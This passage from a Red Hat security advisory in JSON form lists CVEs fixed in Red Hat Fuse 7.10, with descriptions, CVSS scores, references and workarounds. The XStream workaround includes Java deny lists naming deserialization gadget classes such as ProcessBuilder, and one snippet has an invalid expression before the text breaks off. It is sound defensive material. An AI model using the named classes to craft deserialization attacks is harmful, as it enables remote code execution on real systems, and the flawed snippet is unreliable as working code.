"https://bugzilla.redhat.com/show_bug.cgi?id=1851014" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-2934", "url": "https://www.cve.org/CVERecord?id=CVE-2020-2934" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-2934", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2934" } ], "release_date": "2020-04-15T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, 
and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete" }, { "cve": "CVE-2020-9488", "cwe": { "id": "CWE-295", "name": "Improper Certificate Validation" }, "discovery_date": "2020-04-25T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1831139" } ], "notes": [ { "category": "description", "text": "Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. 
Fixed in Apache Log4j 2.12.3 and 2.13.1", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j: improper validation of certificate with host mismatch in SMTP appender", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-9488" }, { "category": "external", "summary": "RHBZ#1831139", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1831139" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-9488", "url": "https://www.cve.org/CVERecord?id=CVE-2020-9488" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-9488", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9488" } ], "release_date": "2020-04-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "Previous versions can set the system property mail.smtp.ssl.checkserveridentity to true to globally enable hostname verification for SMTPS connections.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": 
"HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "log4j: improper validation of certificate with host mismatch in SMTP appender" }, { "cve": "CVE-2020-11987", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "discovery_date": "2021-02-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1933808" } ], "notes": [ { "category": "description", "text": "Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.", "title": "Vulnerability description" }, { "category": "summary", "text": "batik: SSRF due to improper input validation by the NodePickerPanel", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-11987" }, { "category": "external", "summary": "RHBZ#1933808", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933808" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-11987", "url": "https://www.cve.org/CVERecord?id=CVE-2020-11987" }, { "category": "external", 
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11987", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11987" }, { "category": "external", "summary": "https://xmlgraphics.apache.org/security.html", "url": "https://xmlgraphics.apache.org/security.html" } ], "release_date": "2021-02-24T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "batik: SSRF due to improper input validation by the NodePickerPanel" }, { "cve": "CVE-2020-11988", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "discovery_date": "2021-02-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1933816" } ], "notes": [ { "category": 
"description", "text": "Apache XmlGraphics Commons 2.4 and earlier is vulnerable to server-side request forgery, caused by improper input validation by the XMPParser. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. Users should upgrade to 2.6 or later.", "title": "Vulnerability description" }, { "category": "summary", "text": "xmlgraphics-commons: SSRF due to improper input validation by the XMPParser", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw does not affect xmlgraphics-commons as shipped with Red Hat Enterprise Linux 8. It is out of support scope for Red Hat Enterprise Linux 6 and 7. To learn more about support scope for Red Hat Enterprise Linux, please see https://access.redhat.com/support/policy/updates/errata/ .", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-11988" }, { "category": "external", "summary": "RHBZ#1933816", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933816" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-11988", "url": "https://www.cve.org/CVERecord?id=CVE-2020-11988" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11988", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11988" }, { "category": "external", "summary": "https://xmlgraphics.apache.org/security.html", "url": "https://xmlgraphics.apache.org/security.html" } ], "release_date": "2021-02-24T00:00:00+00:00", "remediations": [ { "category": 
"vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "xmlgraphics-commons: SSRF due to improper input validation by the XMPParser" }, { "cve": "CVE-2020-13943", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2020-10-13T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1887648" } ], "notes": [ { "category": "description", "text": "A flaw was found in Apache Tomcat. 
If an HTTP/2 client exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it is possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources. The highest threat from this vulnerability is to data confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "tomcat: Apache Tomcat HTTP/2 Request mix-up", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 8\u0027s Identity Management is using an affected version of Tomcat bundled within PKI servlet engine, however HTTP/2 protocol is not supported by this component.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-13943" }, { "category": "external", "summary": "RHBZ#1887648", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887648" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-13943", "url": "https://www.cve.org/CVERecord?id=CVE-2020-13943" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-13943", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13943" }, { "category": "external", "summary": "http://mail-archives.apache.org/mod_mbox/tomcat-announce/202010.mbox/%3C2b767c6e-dcb9-5816-bd69-a3bc0771fef3%40apache.org%3E", "url": 
"http://mail-archives.apache.org/mod_mbox/tomcat-announce/202010.mbox/%3C2b767c6e-dcb9-5816-bd69-a3bc0771fef3%40apache.org%3E" }, { "category": "external", "summary": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M8", "url": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M8" }, { "category": "external", "summary": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.58", "url": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.58" }, { "category": "external", "summary": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.38", "url": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.38" } ], "release_date": "2020-10-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "tomcat: Apache Tomcat HTTP/2 Request mix-up" }, { "cve": "CVE-2020-13949", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": 
"2021-02-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1928172" } ], "notes": [ { "category": "description", "text": "A flaw was found in libthrift. Applications using Thrift would not show an error upon receiving messages declaring containers of sizes larger than the payload. This results in malicious RPC clients with the ability to send short messages which would result in a large memory allocation, potentially leading to denial of service. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "libthrift: potential DoS when processing untrusted payloads", "title": "Vulnerability summary" }, { "category": "other", "text": "* A vulnerable version of the libthrift library is delivered in listed OpenShift Container Platform (OCP) and OpenShift Jaeger (Jaeger) components, but the vulnerable code is not invoked, therefore these components are affected but with impact Moderate. 
\n\n* For Red Hat OpenStack, because the fix would require a substantial amount of development and OpenDaylight is deprecated in all future versions (RHOSP10 was in tech preview), no update will be provided at this time for the RHOSP libthrift package.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-13949" }, { "category": "external", "summary": "RHBZ#1928172", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928172" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-13949", "url": "https://www.cve.org/CVERecord?id=CVE-2020-13949" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-13949", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13949" } ], "release_date": "2021-02-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": 
"NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "libthrift: potential DoS when processing untrusted payloads" }, { "cve": "CVE-2020-15522", "cwe": { "id": "CWE-367", "name": "Time-of-check Time-of-use (TOCTOU) Race Condition" }, "discovery_date": "2021-05-20T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1962879" } ], "notes": [ { "category": "description", "text": "A flaw was found in bouncycastle. A timing issue within the EC math library can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures.", "title": "Vulnerability description" }, { "category": "summary", "text": "bouncycastle: Timing issue within the EC math library", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-15522" }, { "category": "external", "summary": "RHBZ#1962879", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962879" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-15522", "url": "https://www.cve.org/CVERecord?id=CVE-2020-15522" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15522", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15522" } ], "release_date": "2021-05-20T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": 
"2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "bouncycastle: Timing issue within the EC math library" }, { "cve": "CVE-2020-17521", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2021-01-20T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1922123" } ], "notes": [ { "category": "description", "text": "A flaw was found in Apache Groovy. Groovy makes use of a method for creating temporary directories which is not suitable for security-sensitive contexts and allows for sensitive information leakage. The highest threat from this vulnerability is to data confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "groovy: OS temporary directory leads to information disclosure", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw is rated as having a security impact of Moderate and is not currently planned to be addressed in future updates of Red Hat Enterprise Linux 7. 
Red Hat Enterprise Linux 7 is now in Maintenance Support 2 Phase of the support and maintenance life cycle. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/errata/.\n\nIn OpenShift Container Platform (OCP) the vulnerable version of groovy is delivered in jenkins package and openshift4/ose-metering-hive container. The vulnerable groovy extension methods are not used directly in these components, therefore the impact by this vulnerability is Low.\n\nAlthough an affected version of groovy is shipped in CodeReady Studio, the vulnerable functionality is not used by default, so the impact of this vulnerability is set to Low.\n\nRed Hat CodeReady WorkSpaces 2.7.0 does not ship groovy so is not affected by this flaw.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-17521" }, { "category": "external", "summary": "RHBZ#1922123", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922123" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-17521", "url": "https://www.cve.org/CVERecord?id=CVE-2020-17521" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-17521", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-17521" }, { "category": "external", "summary": "https://groovy-lang.org/security.html#CVE-2020-17521", "url": "https://groovy-lang.org/security.html#CVE-2020-17521" } ], "release_date": "2020-11-19T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", 
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "Setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems and all Groovy versions. Users who cannot easily move to the fixed Groovy versions may wish to consider using the JDK\u2019s Files#createTempDirectory method instead of the Groovy extension methods.", "product_ids": [ "Red Hat Fuse 7.10" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "groovy: OS temporary directory leads to information disclosure" }, { "cve": "CVE-2020-17527", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2020-12-03T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1904221" } ], "notes": [ { "category": "description", "text": "While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an 
HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.", "title": "Vulnerability description" }, { "category": "summary", "text": "tomcat: HTTP/2 request header mix-up", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 8\u0027s Identity Management and Certificate System are using a vulnerable version of Tomcat that is bundled into the pki-servlet-engine component. However, HTTP/2 is not enabled in such a configuration, and it is not possible to trigger the flaw in a supported setup. A future update may fix the code.\n\nRed Hat Enterprise Linux 7\u0027s tomcat package, Identity Management, and Certificate System are all not affected by this flaw because HTTP/2 is not supported in the shipped version of tomcat in those packages.\n\ntomcat5 and tomcat6 in Red Hat Enterprise Linux 5 and 6 (respectively) are not affected by this flaw because HTTP/2 is not supported in the shipped versions of those packages.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-17527" }, { "category": "external", "summary": "RHBZ#1904221", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1904221" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-17527", "url": "https://www.cve.org/CVERecord?id=CVE-2020-17527" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-17527", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2020-17527" }, { "category": "external", "summary": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M10", "url": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M10" }, { "category": "external", "summary": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.60", "url": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.60" }, { "category": "external", "summary": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.40", "url": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.40" } ], "release_date": "2020-12-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "Red Hat Fuse 7.10" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "tomcat: HTTP/2 request header mix-up" }, { "cve": "CVE-2020-26217", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "discovery_date": "2020-11-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1898907" } ], 
"notes": [ { "category": "description", "text": "A flaw was found in xstream. An unsafe deserialization of user-supplied XML, in conjunction with relying on the default deny list, allows a remote attacker to perform a variety of attacks including a remote code execution of arbitrary code in the context of the JVM running the XStream application. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "XStream: remote code execution due to insecure XML deserialization when relying on blocklists", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift Container Platform (OCP) delivers jenkins package with bundled XStream library. Due to JEP-200 Jenkins project [1] and advisory SECURITY-383 [2], OCP jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://www.jenkins.io/security/advisory/2017-02-01/ (see SECURITY-383 / CVE-2017-2608)", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Fuse 7.10" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-26217" }, { "category": "external", "summary": "RHBZ#1898907", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898907" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-26217", "url": "https://www.cve.org/CVERecord?id=CVE-2020-26217" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-26217", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26217" } ], "release_date": 
"2020-11-16T19:40:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:31:33+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/", "product_ids": [ "Red Hat Fuse 7.10" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "category": "workaround", "details": "Depending on the version of XStream used there are various usage patterns that mitigate this flaw, though we would strongly recommend using the allow list approach if at all possible as there are likely more class combinations the deny list approach may not address.\n\nAllow list approach\n```java\nXStream xstream = new XStream();\nXStream.setupDefaultSecurity(xstream);\nxstream.allowTypesByWildcard(new String[] {\"com.misc.classname\"})\n```\n\nDeny list for XStream 1.4.13\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\n```\n\nDeny list for XStream 1.4.7 -\u003e 1.4.12\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\n```\n\nDeny list for versions prior to XStream 1.4.7\n```java\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null \u0026\u0026 (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || Proxy.isProxy(type));\n }\n\n public Object 
